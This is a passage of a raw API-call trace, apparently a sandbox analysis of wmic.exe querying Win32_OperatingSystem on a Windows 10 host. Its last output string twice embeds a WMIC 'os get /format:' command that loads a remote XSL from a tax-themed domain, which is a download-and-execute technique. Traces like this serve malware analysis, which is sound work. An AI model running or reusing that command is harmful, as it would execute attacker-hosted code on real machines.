(param_1="QuantumLength") returned 0xd [0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17 [0050.770] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17 [0050.770] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17 [0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17 [0050.770] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17 [0050.770] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17 [0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17 [0050.770] IUnknown:Release (This=0x233e12da320) returned 0x1 [0050.770] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.770] IWbemClassObject:Get (in: This=0x233e12e4710, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ebf48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.770] IWbemClassObject:Get (in: This=0x233e12e4710, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ec038, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.771] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.771] IWbemClassObject:Get (in: This=0x233e12e4710, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Status property is a string indicating the current status of the object. Various operational and non-operational statuses can be defined. Operational statuses are \"OK\", \"Degraded\" and \"Pred Fail\". \"Pred Fail\" indicates that an element may be functioning properly but predicting a failure in the near future. An example is a SMART-enabled hard drive. Non-operational statuses can also be specified. These are \"Error\", \"Starting\", \"Stopping\" and \"Service\". The latter, \"Service\", could apply during mirror-resilvering of a disk, reload of a user permissions list, or other administrative work. Not all such work is on-line, yet the managed element is neither \"OK\" nor in one of the other states.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.771] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.771] lstrlenA (lpString="") returned 0 [0050.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc240, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.771] SysStringLen (param_1="The Status property is a string indicating the current status of the object. Various operational and non-operational statuses can be defined. Operational statuses are \"OK\", \"Degraded\" and \"Pred Fail\". \"Pred Fail\" indicates that an element may be functioning properly but predicting a failure in the near future. An example is a SMART-enabled hard drive. Non-operational statuses can also be specified. These are \"Error\", \"Starting\", \"Stopping\" and \"Service\". The latter, \"Service\", could apply during mirror-resilvering of a disk, reload of a user permissions list, or other administrative work. Not all such work is on-line, yet the managed element is neither \"OK\" nor in one of the other states.") returned 0x2b9 [0050.771] SysStringLen (param_1="") returned 0x0 [0050.771] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.771] IWbemClassObject:Get (in: This=0x233e12e4710, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eeca0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e12719f0, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.772] SafeArrayGetLBound (in: psa=0x233e12eeca0, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0 [0050.772] SafeArrayGetUBound (in: psa=0x233e12eeca0, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0 [0050.772] SafeArrayGetElement (in: psa=0x233e12eeca0, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0 [0050.772] IWbemClassObject:Get (in: This=0x233e12e4460, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxLen", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.772] IWbemClassObject:Get (in: This=0x233e12e4460, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eed60*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e1271120, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.772] SafeArrayGetLBound (in: psa=0x233e12eed60, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0 [0050.772] SafeArrayGetUBound (in: psa=0x233e12eed60, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0 [0050.772] lstrlenW (lpString="CIMTYPE") returned 7 [0050.772] lstrlenW (lpString="MaxLen") returned 6 [0050.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3 [0050.772] lstrlenW (lpString="read") returned 4 [0050.772] lstrlenW (lpString="MaxLen") returned 6 [0050.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="read", cchCount2=4) returned 1 [0050.772] lstrlenW (lpString="write") returned 5 [0050.772] lstrlenW (lpString="MaxLen") returned 6 [0050.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="write", cchCount2=5) returned 1 [0050.772] lstrlenW (lpString="In") returned 2 [0050.772] lstrlenW (lpString="MaxLen") returned 6 [0050.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="In", cchCount2=2) returned 3 [0050.772] lstrlenW (lpString="Out") returned 3 [0050.772] lstrlenW (lpString="MaxLen") returned 6 [0050.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="Out", cchCount2=3) returned 1 [0050.772] SafeArrayGetElement (in: psa=0x233e12eed60, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.773] IUnknown:Release (This=0x233e12e4460) returned 0x1 [0050.773] lstrlenW (lpString="CIMTYPE") returned 7 [0050.773] lstrlenW (lpString="ValueMap") returned 8 [0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="CIMTYPE", cchCount2=7) returned 3 [0050.773] lstrlenW (lpString="read") returned 4 [0050.773] lstrlenW (lpString="ValueMap") returned 8 [0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="read", cchCount2=4) returned 3 [0050.773] lstrlenW (lpString="write") returned 5 [0050.773] lstrlenW (lpString="ValueMap") returned 8 [0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="write", cchCount2=5) returned 1 [0050.773] lstrlenW (lpString="In") returned 2 [0050.773] lstrlenW (lpString="ValueMap") returned 8 [0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="In", cchCount2=2) returned 3 [0050.773] lstrlenW (lpString="Out") returned 3 [0050.773] lstrlenW (lpString="ValueMap") returned 8 [0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="Out", cchCount2=3) returned 3 [0050.773] SafeArrayGetElement (in: psa=0x233e12ee620, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.773] IUnknown:Release (This=0x233e12e39a0) returned 0x1 [0050.773] lstrlenW (lpString="CIMTYPE") returned 7 [0050.773] lstrlenW (lpString="Values") returned 6 [0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3 [0050.773] lstrlenW (lpString="read") returned 4 [0050.773] lstrlenW (lpString="Values") returned 6 [0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3 [0050.773] lstrlenW (lpString="write") returned 5 [0050.773] lstrlenW (lpString="Values") returned 6 [0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1 [0050.773] lstrlenW (lpString="In") returned 2 [0050.773] lstrlenW (lpString="Values") returned 6 [0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3 [0050.773] lstrlenW (lpString="Out") returned 3 [0050.774] lstrlenW (lpString="Values") returned 6 [0050.774] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3 [0050.774] SafeArrayGetElement (in: psa=0x233e12ee620, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.774] IUnknown:Release (This=0x233e12e41b0) returned 0x1 [0050.774] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.774] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.774] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.774] lstrlenA (lpString="") returned 0 [0050.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.775] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.775] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.775] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.775] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.775] lstrlenA (lpString="") returned 0 [0050.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc220, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.775] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.775] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.775] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.776] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.776] lstrlenA (lpString="") returned 0 [0050.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.776] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.776] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.776] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.776] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.776] lstrlenA (lpString="") returned 0 [0050.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc220, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.777] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.777] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.777] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.777] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.777] lstrlenA (lpString="") returned 0 [0050.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.777] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.777] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.778] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.778] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.778] lstrlenA (lpString="") returned 0 [0050.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.778] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.778] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.778] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.779] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.779] lstrlenA (lpString="") returned 0 [0050.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc210, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.779] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.779] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.779] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.779] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.780] lstrlenA (lpString="") returned 0 [0050.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc170, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.780] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.780] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.781] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.782] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35 [0050.782] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35 [0050.782] wcstok (in: _String="Select * from Win32_OperatingSystem", _Delimiter=" ", _Context=0xfffffffffddea1f0 | out: _String="Select", _Context=0xfffffffffddea1f0) returned="Select" [0050.782] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0050.782] lstrlenW (lpString="FROM") returned 4 [0050.782] lstrlenW (lpString="*") returned 1 [0050.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0050.782] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x233e1010db0*="" | out: _String=0x0, _Context=0x233e1010db0*="") returned="from" [0050.782] lstrlenW (lpString="FROM") returned 4 [0050.782] lstrlenW (lpString="from") returned 4 [0050.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0050.782] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x233e1010db0*="" | out: _String=0x0, _Context=0x233e1010db0*="") returned="Win32_OperatingSystem" [0050.783] lstrlenW (lpString="SET") returned 3 [0050.783] lstrlenW (lpString="get") returned 3 [0050.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1 [0050.783] lstrlenW (lpString="CREATE") returned 6 [0050.783] lstrlenW (lpString="get") returned 3 [0050.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="CREATE", cchCount2=6) returned 3 [0050.783] lstrlenW (lpString="GET") returned 3 [0050.783] lstrlenW (lpString="get") returned 3 [0050.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2 [0050.783] ??0CHString@@QEAA@XZ () returned 0x350027f660 [0050.783] memcpy_s (in: _Destination=0x233e14fc2e0, _DestinationSize=0x1e, _Source=0x233e128e438, _SourceSize=0x10 | out: _Destination=0x233e14fc2e0) returned 0x0 [0050.783] lstrlenW (lpString="&") returned 1 [0050.783] lstrlenW (lpString="&") returned 5 [0050.783] lstrlenW (lpString="<") returned 1 [0050.783] lstrlenW (lpString="<") returned 4 [0050.783] lstrlenW (lpString=">") returned 1 [0050.783] lstrlenW (lpString=">") returned 4 [0050.783] lstrlenW (lpString="'") returned 1 [0050.783] lstrlenW (lpString="'") returned 6 [0050.783] lstrlenW (lpString="\"") returned 1 [0050.783] lstrlenW (lpString=""") returned 6 [0050.783] ?Format@CHString@@QEAAXPEBGZZ () returned 0x233e37120bc [0050.784] ??1CHString@@QEAA@XZ () returned 0x1 [0050.784] WbemLocator:IUnknown:AddRef (This=0x233e12241d0) returned 0x3 [0050.784] lstrlenW (lpString="") returned 0 [0050.784] lstrlenW (lpString="X2VS1CUM") returned 8 [0050.784] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2="", cchCount2=0) returned 3 [0050.784] lstrlenW (lpString="X2VS1CUM") returned 8 [0050.784] lstrlenW (lpString="X2VS1CUM") returned 8 [0050.784] GetCurrentThreadId () returned 0xdf0 [0050.784] GetCurrentProcess () returned 0xffffffffffffffff [0050.784] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x350027f4f0 | out: TokenHandle=0x350027f4f0*=0x29c) returned 1 [0050.784] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x350027f4e8 | out: TokenInformation=0x0, ReturnLength=0x350027f4e8) returned 0 [0050.784] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x233e3710f20, TokenInformationLength=0x40, ReturnLength=0x350027f4e8 | out: TokenInformation=0x233e3710f20, ReturnLength=0x350027f4e8) returned 1 [0050.784] AdjustTokenPrivileges (in: TokenHandle=0x29c, DisableAllPrivileges=0, NewState=0x233e3710f20*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=-500686573, Attributes=0x80001500))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0050.784] CloseHandle (hObject=0x29c) returned 1 [0050.784] lstrlenW (lpString="GET") returned 3 [0050.784] lstrlenW (lpString="get") returned 3 [0050.784] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2 [0050.786] lstrlenA (lpString="") returned 0 [0050.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.786] lstrlenA (lpString="") returned 0 [0050.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc240, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.786] lstrlenA (lpString="") returned 0 [0050.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1e0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.787] lstrlenA (lpString="") returned 0 [0050.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.787] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35 [0050.787] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35 [0050.787] wcstok (in: _String="Select * from Win32_OperatingSystem", _Delimiter=" ", _Context=0xfffffffffddea510 | out: _String="Select", _Context=0xfffffffffddea510) returned="Select" [0050.787] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x233e1010db0*="" | out: _String=0x0, _Context=0x233e1010db0*="") returned="*" [0050.787] lstrlenW (lpString="FROM") returned 4 [0050.787] lstrlenW (lpString="*") returned 1 [0050.787] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0050.787] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x233e1010db0*="" | out: _String=0x0, _Context=0x233e1010db0*="") returned="from" [0050.787] lstrlenW (lpString="FROM") returned 4 [0050.787] lstrlenW (lpString="from") returned 4 [0050.787] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0050.788] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x233e1010db0*="" | out: _String=0x0, _Context=0x233e1010db0*="") returned="Win32_OperatingSystem" [0050.788] lstrlenA (lpString=" FROM ") returned 6 [0050.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6c0020, cbMultiByte=-1, lpWideCharStr=0x233e37157f0, cchWideChar=7 | out: lpWideCharStr=" FROM ") returned 7 [0050.788] lstrlenA (lpString="SELECT ") returned 7 [0050.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6c0028, cbMultiByte=-1, lpWideCharStr=0x233e37156d0, cchWideChar=8 | out: lpWideCharStr="SELECT ") returned 8 [0050.788] ??0CHString@@QEAA@XZ () returned 0x350027b3c0 [0050.788] GetCurrentThreadId () returned 0xdf0 [0050.788] CoCreateInstance (in: rclsid=0x7ff66e6c3548*(Data1=0x8d1c559d, Data2=0x84f0, Data3=0x4bb3, Data4=([0]=0xa7, [1]=0xd5, [2]=0x56, [3]=0xa7, [4]=0x43, [5]=0x5a, [6]=0x9b, [7]=0xa6)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff66e6c3558*(Data1=0xbfbf883a, Data2=0xcad7, Data3=0x11d3, Data4=([0]=0xa1, [1]=0x1b, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x51, [7]=0x5a)), ppv=0x7ff66e6da8c0 | out: ppv=0x7ff66e6da8c0*=0x233e12eecb0) returned 0x0 [0050.792] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.792] ??0CHString@@QEAA@XZ () returned 0x350027b3c0 [0050.792] GetCurrentThreadId () returned 0xdf0 [0050.792] WbemLocator:IWbemLocator:ConnectServer (in: This=0x233e12241d0, strNetworkResource="\\\\X2VS1CUM\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff66e6da8d0 | out: ppNamespace=0x7ff66e6da8d0*=0x233e12920a0) returned 0x0 [0050.798] CoSetProxyBlanket (pProxy=0x233e12920a0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0050.798] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.799] ??0CHString@@QEAA@XZ () returned 0x350027b2b8 [0050.799] GetCurrentThreadId () returned 0xdf0 [0050.799] ??0CHString@@QEAA@XZ () returned 0x350027b260 [0050.799] GetCurrentThreadId () returned 0xdf0 [0050.799] CoCreateInstanceEx (in: Clsid=0x7ff66e6c3528*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), punkOuter=0x0, dwClsCtx=0x1, pServerInfo=0x0, dwCount=0x1, pResults=0x350027b210 | out: pResults=((pIID=0x7ff66e6c3538*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pItf=0x233e1274ba0, hr=0x0))) returned 0x0 [0050.800] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.826] wcsstr (_Str="Win32_OperatingSystem", _SubStr="Win32_DiskDrive") returned 0x0 [0050.929] WbemObjectTextSrc:IWbemObjectTextSrc:GetText (in: This=0x233e12eecb0, lFlags=0, pObj=0x233e12e4710, uObjTextFormat=0x1, pCtx=0x233e1274ba0, strText=0x350027b2c0 | out: strText=0x350027b2c0*="\\Device\\HarddiskVolume110586Multiprocessor FreeMicrosoft Windows 10 Pro12521Win32_OperatingSystemWin32_ComputerSystemX2VS1CUM120TRUETRUETRUE2FALSEFALSE256212375241179648250175620170802150607.000000+12020180626225658.765149+12020180626225906.657000+1200409Microsoft Corporation4294967295137438953344en-USMicrosoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition158248NHaYZ264-bit103325618 os get /format:"https://itaxkenya.com/kra/tax_returns.xsl" X2VS1CUMroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON\\Device\\HarddiskVolume110586Multiprocessor FreeMicrosoft Windows 10 Pro12521Win32_OperatingSystemWin32_ComputerSystemX2VS1CUM120TRUETRUETRUE2FALSEFALSE256212375241179648250175620170802150607.000000+12020180626225658.765149+12020180626225906.657000+1200409Microsoft Corporation4294967295137438953344en-USMicrosoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1582\\Device\\HarddiskVolume110586Multiprocessor FreeMicrosoft Windows 10 Pro12521Win32_OperatingSystemWin32_ComputerSystemX2VS1CUM120TRUETRUETRUE2FALSEFALSE2562385684359338896878020170802150607.000000+12020180626225658.765149+12020180626230007.241000+1200409Microsoft Corporation4294967295137438953344en-USMicrosoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition161248NHaYZ264-bit103325618 os get /format:"https://itaxkenya.com/kra/tax_returns.xsl" X2VS1CUMroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON\\Device\\HarddiskVolume110586Multiprocessor FreeMicrosoft Windows 10 Pro12521Win32_OperatingSystemWin32_ComputerSystemX2VS1CUM120TRUETRUETRUE2FALSEFALSE2562385684359338896878020170802150607.000000+12020180626225658.765149+12020180626230007.241000+1200409Microsoft Corporation4294967295137438953344en-USMicrosoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1612